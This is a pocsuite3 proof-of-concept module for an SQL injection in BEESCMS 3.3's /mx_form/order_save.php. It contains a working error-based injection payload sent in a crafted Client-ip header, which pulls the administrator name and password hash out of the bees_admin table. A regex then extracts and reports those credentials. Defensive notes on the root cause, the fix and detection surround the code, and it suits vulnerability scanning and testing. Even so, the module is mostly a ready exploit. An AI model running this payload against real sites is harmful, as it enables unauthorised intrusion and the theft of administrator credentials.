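"""pocsuite3 check for the BEESCMS 3.3 ``/mx_form/order_save.php`` SQL injection.

According to the ``desc`` field below, the ``$ip`` check at line 59 of
``order_save.php`` can be bypassed by varying letter case, and ``$ip`` is then
concatenated into an SQL statement at line 63.  This module sends a single
POST request carrying a crafted ``Client-ip`` header (presumably the value the
application reads into ``$ip`` -- confirm against the application source) and
searches the response body for a marker-delimited record.

Defensive notes:
  * Root cause: a client-supplied header value is concatenated into SQL.  The
    durable fix is a parameterized query plus strict validation that the
    value is a syntactically valid IP address.
  * Detection: requests to ``/mx_form/order_save.php`` whose ``Client-ip``
    header contains characters that cannot occur in an IP address (quotes,
    parentheses, ``#``) match the request this module sends.

If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
import re

# Matches the record the injected query wraps in fixed markers:
#   0x7167766571 -> "qgveq", 0x7c -> "|", 0x3a73706c69743a -> ":split:",
#   0x716b616771 -> "qkagq"
# Group 1 is the admin_name column, group 2 a 32-hex-character admin_password
# value (the length of an MD5 digest).  Written as a raw string: the original
# non-raw literal used "\|", an invalid string escape that newer Python
# versions warn about.
_MARKER_RE = re.compile(r'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq')


class DemoPOC(POCBase):
    """Metadata and check logic for Seebug entry 1249 (BEESCMS 3.3 SQL injection)."""

    vulID = '1249'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-04-12'
    createDate = '2014-04-18'
    updateDate = '2014-04-18'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-055608']
    name = 'beescms 3.3 /mx_form/order_save.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.beescms.com/'
    appName = 'BEESCMS'
    appVersion = '3.3#'
    vulType = 'SQL Injection'
    # English summary of desc: in BEESCMS 3.3 /mx_form/order_save.php, the
    # check on $ip at line 59 can be bypassed with mixed letter case, and at
    # line 63 $ip is concatenated into the SQL statement, which produces the
    # SQL injection.
    desc = ''' BEESCMS 3.3 /mx_form/order_save.php文件中 line 59对$ip的检查可以使用大小写绕过,然后在line 63将$ip拼接在SQL语句中 形成SQL注入漏洞 '''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Send the check request and report whether the marker record came back.

        Returns:
            The ``Output`` built by ``parse_output``: success with a
            ``Database`` entry holding ``Username`` and ``Password`` when the
            marker record is found in the response body, failure otherwise.
        """
        url = self.url + '/mx_form/order_save.php'

        # The header value closes the quoted string the application builds
        # and appends a subquery over bees_admin.  The count()/rand()/GROUP BY
        # shape looks like the duplicate-key error technique, where the
        # database error text echoes the concatenated value -- the regex
        # below only requires that the markers appear in the response body.
        headers_fake = {
            'Client-ip': (
                "127.0.0.1',(SELECT 1 FROM (SELECT count(1),"
                'concat(round(rand(0)),(SELECT concat(0x71677'
                '66571,0x7c,admin_name,0x3a73706c69743a,admin'
                '_password,0x7c,0x716b616771) FROM bees_admin'
                ' LIMIT 0,1))a FROM information_schema.tables'
                ' GROUP by a)b))#'
            ),
        }

        # Pre-encoded form body for the order form; sent as a string, so
        # requests transmits it unchanged.
        data = (
            'form_id=5&fields%5Bmail%5D=1&fields%5Busername%5D=1&fields%5Btel%'
            '5D=1&fields%5Bweb_contact%5D=1&fields%5Baddress%5D=1&fields%5Bcon'
            'tent%5D=1&lang=cn&f_id=23&submit=%E6%8F%90%E4%BA%A4'
        )

        r = requests.post(url, data=data, headers=headers_fake)

        result = {}
        # Only the first marker record is used, as in the original
        # findall(...)[0] lookup.
        match = _MARKER_RE.search(r.text)
        if match:
            # NOTE(review): these are a live administrator name and password
            # hash; anything that stores this Output (logs, reports) is
            # holding credential material.
            result['Database'] = {
                'Username': match.group(1),
                'Password': match.group(2),
            }

        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Attack mode issues the same single request as ``_verify``."""
        return self._verify()

    def _shell(self):
        """Shell mode is not implemented for this entry."""
        pass


register_poc(DemoPOC)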
暂无官方解决方案
暂无防护方案